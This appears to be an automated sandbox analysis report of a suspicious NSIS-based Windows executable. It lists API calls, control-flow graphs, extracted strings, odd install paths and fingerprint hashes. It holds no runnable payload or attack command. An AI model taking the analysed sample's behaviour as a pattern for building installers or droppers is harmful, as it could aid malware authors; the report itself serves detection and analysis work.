                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                        • Instruction ID: 5eb670257f645768a78f75f5229fdd379fa6a203c359b676d04f77a704ba2a21
                                                        • Opcode Fuzzy Hash: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                        • Instruction Fuzzy Hash: 9DF08271A04105AADB00EBA5D9499AEB378EF14314F60017BE111F31E5D7B88E51DB29

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 151 40508e-4050da GetDlgItem * 2 152 4050e0-405178 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 151->152 153 405305-40530c 151->153 156 405187-40518e DeleteObject 152->156 157 40517a-405185 SendMessageW 152->157 154 405320 153->154 155 40530e-40531e 153->155 158 405323-40532c 154->158 155->158 159 405190-405198 156->159 157->156 162 405337-40533d 158->162 163 40532e-405331 158->163 160 4051c1-4051c5 159->160 161 40519a-40519d 159->161 160->159 169 4051c7-4051f7 call 404621 * 2 160->169 165 4051a2-4051bf call 4066df SendMessageW * 2 161->165 166 40519f 161->166 167 40534c-405353 162->167 168 40533f-405346 162->168 163->162 164 40541b-405422 163->164 174 405493-40549b 164->174 175 405424-40542a 164->175 165->160 166->165 171 405355-405358 167->171 172 4053c8-4053cb 167->172 168->164 168->167 208 4052c7-4052da GetWindowLongW SetWindowLongW 169->208 209 4051fd-405203 169->209 180 405363-405378 call 404fdc 171->180 181 40535a-405361 171->181 172->164 176 4053cd-4053d7 172->176 177 4054a5-4054ac 174->177 178 40549d-4054a3 SendMessageW 174->178 183 405430-40543a 175->183 184 405686-405698 call 404688 175->184 185 4053e7-4053f1 176->185 186 4053d9-4053e5 SendMessageW 176->186 188 4054e0-4054e7 177->188 189 4054ae-4054b5 177->189 178->177 180->172 207 40537a-40538b 180->207 181->172 181->180 183->184 192 405440-40544f SendMessageW 183->192 185->164 193 4053f3-4053fd 185->193 186->185 199 405648-40564f 188->199 200 4054ed-4054f9 call 4011ef 188->200 195 4054b7-4054b8 ImageList_Destroy 189->195 196 4054be-4054c5 189->196 192->184 201 405455-405466 SendMessageW 192->201 203 40540e-405418 193->203 204 4053ff-40540c 193->204 195->196 205 4054c7-4054c8 GlobalFree 196->205 206 4054ce-4054da 196->206 199->184 202 405651-405658 199->202 226 405509-40550c 200->226 227 4054fb-4054fe 200->227 211 405470-405472 201->211 212 405468-40546e 201->212 202->184 213 40565a-405684 ShowWindow GetDlgItem ShowWindow 202->213 203->164 204->164 205->206 206->188 207->172 215 40538d-40538f 207->215 214 4052e0-4052e3 208->214 216 405206-40520c 209->216 218 405473-40548c call 401299 SendMessageW 211->218 212->211 212->218 213->184 220 4052e5-4052f8 ShowWindow call 404656 214->220 221 4052fd-405300 call 404656 214->221 222 405391-405398 215->222 223 4053a2 215->223 224 405212-40523d 216->224 225 4052a9-4052bc 216->225 218->174 220->184 221->153 234 40539a-40539c 222->234 235 40539e-4053a0 222->235 236 4053a5-4053c1 call 40117d 223->236 237 405279-40527b 224->237 238 40523f-405277 SendMessageW 224->238 225->216 229 4052c2-4052c5 225->229 230 40554d-405571 call 4011ef 226->230 231 40550e-405527 call 4012e2 call 401299 226->231 239 405500 227->239 240 405501-405504 call 40505c 227->240 229->208 229->214 252 405613-40561c 230->252 253 405577 230->253 261 405537-405546 SendMessageW 231->261 262 405529-40552f 231->262 234->236 235->236 236->172 242 405291-4052a6 SendMessageW 237->242 243 40527d-40528f SendMessageW 237->243 238->225 239->240 240->226 242->225 243->225 256 40562a-405632 252->256 257 40561e-405624 InvalidateRect 252->257 254 40557a-405585 253->254 258 405587-405596 254->258 259 4055fb-40560d 254->259 256->199 260 405634-405643 call 404faf call 404f97 256->260 257->256 263 405598-4055a5 258->263 264 4055a9-4055ac 258->264 259->252 259->254 260->199 261->230 265 405531 262->265 266 405532-405535 262->266 263->264 268 4055b3-4055bc 264->268 269 4055ae-4055b1 264->269 265->266 266->261 266->262 271 4055c1-4055f9 SendMessageW * 2 268->271 272 4055be 268->272 269->271 271->259 272->271
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                        • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                        • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                        • DeleteObject.GDI32(00000000), ref: 00405188
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                          • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                        • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                        • GlobalFree.KERNEL32(?), ref: 004054C8
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                        • ShowWindow.USER32(?,00000000), ref: 00405672
                                                        • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                        • ShowWindow.USER32(00000000), ref: 00405684
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                        • Instruction ID: 34ca0daebb1283ae0dea41fcbe79f03df20d3d5ccd25e7298a94edbde83860af
                                                        • Opcode Fuzzy Hash: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                        • Instruction Fuzzy Hash: F5028C70A00609AFDB20DF55CD45AAF7BB5FB84314F50857AF910BA2E1D7B98A42CF18

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 274 404122-404134 275 40413a-404140 274->275 276 40429b-4042aa 274->276 275->276 277 404146-40414f 275->277 278 4042f9-40430e 276->278 279 4042ac-4042f4 GetDlgItem * 2 call 404621 SetClassLongW call 40140b 276->279 282 404151-40415e SetWindowPos 277->282 283 404164-40416b 277->283 280 404310-404313 278->280 281 40434e-404353 call 40466d 278->281 279->278 285 404315-404320 call 401389 280->285 286 404346-404348 280->286 293 404358-404373 281->293 282->283 288 40416d-404187 ShowWindow 283->288 289 4041af-4041b5 283->289 285->286 310 404322-404341 SendMessageW 285->310 286->281 292 4045ee 286->292 294 404288-404296 call 404688 288->294 295 40418d-4041a0 GetWindowLongW 288->295 296 4041b7-4041c9 DestroyWindow 289->296 297 4041ce-4041d1 289->297 306 4045f0-4045f7 292->306 303 404375-404377 call 40140b 293->303 304 40437c-404382 293->304 294->306 295->294 305 4041a6-4041a9 ShowWindow 295->305 307 4045cb-4045d1 296->307 299 4041d3-4041df SetWindowLongW 297->299 300 4041e4-4041ea 297->300 299->306 300->294 309 4041f0-4041ff GetDlgItem 300->309 303->304 314 404388-404393 304->314 315 4045ac-4045c5 DestroyWindow EndDialog 304->315 305->289 307->292 313 4045d3-4045d9 307->313 316 404201-404218 SendMessageW IsWindowEnabled 309->316 317 40421e-404221 309->317 310->306 313->292 318 4045db-4045e4 ShowWindow 313->318 314->315 319 404399-4043e6 call 4066df call 404621 * 3 GetDlgItem 314->319 315->307 316->292 316->317 320 404223-404224 317->320 321 404226-404229 317->321 318->292 346 4043f0-40442c ShowWindow KiUserCallbackDispatcher call 404643 EnableWindow 319->346 347 4043e8-4043ed 319->347 324 404254-404259 call 4045fa 320->324 325 404237-40423c 321->325 326 40422b-404231 321->326 324->294 329 404272-404282 SendMessageW 325->329 331 40423e-404244 325->331 326->329 330 404233-404235 326->330 329->294 330->324 334 404246-40424c call 40140b 331->334 335 40425b-404264 call 40140b 331->335 344 404252 334->344 335->294 343 404266-404270 335->343 343->344 344->324 350 404431 346->350 351 40442e-40442f 346->351 347->346 352 404433-404461 GetSystemMenu EnableMenuItem SendMessageW 350->352 351->352 353 404463-404474 SendMessageW 352->353 354 404476 352->354 355 40447c-4044bb call 404656 call 404103 call 4066a2 lstrlenW call 4066df SetWindowTextW call 401389 353->355 354->355 355->293 366 4044c1-4044c3 355->366 366->293 367 4044c9-4044cd 366->367 368 4044ec-404500 DestroyWindow 367->368 369 4044cf-4044d5 367->369 368->307 370 404506-404533 CreateDialogParamW 368->370 369->292 371 4044db-4044e1 369->371 370->307 372 404539-404590 call 404621 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 370->372 371->293 373 4044e7 371->373 372->292 378 404592-4045aa ShowWindow call 40466d 372->378 373->292 378->307
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                        • ShowWindow.USER32(?), ref: 0040417E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                        • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                        • DestroyWindow.USER32 ref: 004041BD
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                        • GetDlgItem.USER32(?,?), ref: 004041F5
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                        • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                        • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                        • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                        • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                        • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404409
                                                        • EnableWindow.USER32(?,?), ref: 00404424
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                        • EnableMenuItem.USER32(00000000), ref: 00404441
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                        • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404496
                                                        • SetWindowTextW.USER32(?,00422F48), ref: 004044AA
                                                        • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: H/B
                                                        • API String ID: 121052019-184950203
                                                        • Opcode ID: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                        • Instruction ID: 9a8659dd655c0040c26f3da6c71aaed3cdb3e7512c47e66a19b3526095f1ef41
                                                        • Opcode Fuzzy Hash: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                        • Instruction Fuzzy Hash: 0FC1CEB1600604BBDB216F61EE85E2B7A68FB85345F41093EF741B25F0CB799842DB2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 381 403d74-403d8c call 406a96 384 403da0-403dd7 call 406570 381->384 385 403d8e-403d99 GetUserDefaultUILanguage call 4065e9 381->385 391 403dd9-403dea call 406570 384->391 392 403def-403df5 lstrcatW 384->392 388 403d9e 385->388 390 403dfa-403e23 call 40404a call 406079 388->390 398 403eb5-403ebd call 406079 390->398 399 403e29-403e2e 390->399 391->392 392->390 405 403ecb-403ef0 LoadImageW 398->405 406 403ebf-403ec6 call 4066df 398->406 399->398 401 403e34-403e5c call 406570 399->401 401->398 407 403e5e-403e62 401->407 409 403f71-403f79 call 40140b 405->409 410 403ef2-403f22 RegisterClassW 405->410 406->405 411 403e74-403e80 lstrlenW 407->411 412 403e64-403e71 call 405f9e 407->412 423 403f83-403f8e call 40404a 409->423 424 403f7b-403f7e 409->424 413 404040 410->413 414 403f28-403f6c SystemParametersInfoW CreateWindowExW 410->414 418 403e82-403e90 lstrcmpiW 411->418 419 403ea8-403eb0 call 405f71 call 4066a2 411->419 412->411 417 404042-404049 413->417 414->409 418->419 422 403e92-403e9c GetFileAttributesW 418->422 419->398 426 403ea2-403ea3 call 405fbd 422->426 427 403e9e-403ea0 422->427 433 403f94-403fae ShowWindow call 406a26 423->433 434 404017-40401f call 4057fa 423->434 424->417 426->419 427->419 427->426 439 403fb0-403fb5 call 406a26 433->439 440 403fba-403fcc GetClassInfoW 433->440 441 404021-404027 434->441 442 404039-40403b call 40140b 434->442 439->440 445 403fe4-404007 DialogBoxParamW call 40140b 440->445 446 403fce-403fde GetClassInfoW RegisterClassW 440->446 441->424 447 40402d-404034 call 40140b 441->447 442->413 451 40400c-404015 call 403cc4 445->451 446->445 447->424 451->417
                                                        APIs
                                                          • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                          • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00008001), ref: 00403D8E
                                                          • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                        • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00008001), ref: 00403DF5
                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\fllesskabsejede\Modfaldent,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,76233420), ref: 00403E75
                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\fllesskabsejede\Modfaldent,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E88
                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403E93
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\fllesskabsejede\Modfaldent), ref: 00403EDC
                                                        • RegisterClassW.USER32(00428A00), ref: 00403F19
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FC8
                                                        • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FD5
                                                        • RegisterClassW.USER32(00428A00), ref: 00403FDE
                                                        • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\fllesskabsejede\Modfaldent$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 606308-3215237670
                                                        • Opcode ID: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                        • Instruction ID: c4c704bd5297fd73affe36db923882850e9d0fe41f98d1713f1e709c6875f219
                                                        • Opcode Fuzzy Hash: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                        • Instruction Fuzzy Hash: E061C670240701BAD620AB66AD46F2B3A7CEB85745F41453FF941B22E2DF7D5D02CA2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 454 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 457 403145-40314a 454->457 458 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 454->458 459 40338f-403393 457->459 466 403183 458->466 467 403268-403276 call 403053 458->467 469 403188-40319f 466->469 473 403347-40334c 467->473 474 40327c-40327f 467->474 471 4031a1 469->471 472 4031a3-4031ac call 403607 469->472 471->472 481 4031b2-4031b9 472->481 482 403303-40330b call 403053 472->482 473->459 476 403281-403299 call 40361d call 403607 474->476 477 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 474->477 476->473 505 40329f-4032a5 476->505 503 4032f9-4032fe 477->503 504 40330d-40333d call 40361d call 403396 477->504 486 403235-403239 481->486 487 4031bb-4031cf call 40614d 481->487 482->473 492 403243-403249 486->492 493 40323b-403242 call 403053 486->493 487->492 501 4031d1-4031d8 487->501 494 403258-403260 492->494 495 40324b-403255 call 406b83 492->495 493->492 494->469 502 403266 494->502 495->494 501->492 508 4031da-4031e1 501->508 502->467 503->459 515 403342-403345 504->515 505->473 505->477 508->492 510 4031e3-4031ea 508->510 510->492 512 4031ec-4031f3 510->512 512->492 514 4031f5-403215 512->514 514->473 516 40321b-40321f 514->516 515->473 517 40334e-40335f 515->517 518 403221-403225 516->518 519 403227-40322f 516->519 520 403361 517->520 521 403367-40336c 517->521 518->502 518->519 519->492 523 403231-403233 519->523 520->521 522 40336d-403373 521->522 522->522 524 403375-40338d call 40614d 522->524 523->492 524->459
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00403109
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\0GuwV0t2UU.exe,00000400), ref: 00403125
                                                          • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00406196
                                                          • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                        • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\0GuwV0t2UU.exe,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 0040316E
                                                        • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 004032B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\0GuwV0t2UU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-1980434233
                                                        • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                        • Instruction ID: 4d59aa34fe8aef517225e0e03f455ac639a07fb2fd098cfe03fbce1fe051b31e
                                                        • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                        • Instruction Fuzzy Hash: 4671D071A00204ABDB20DFA4DD86BAE3EACAB04715F20457FE915B72C1CB789F418B5C

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
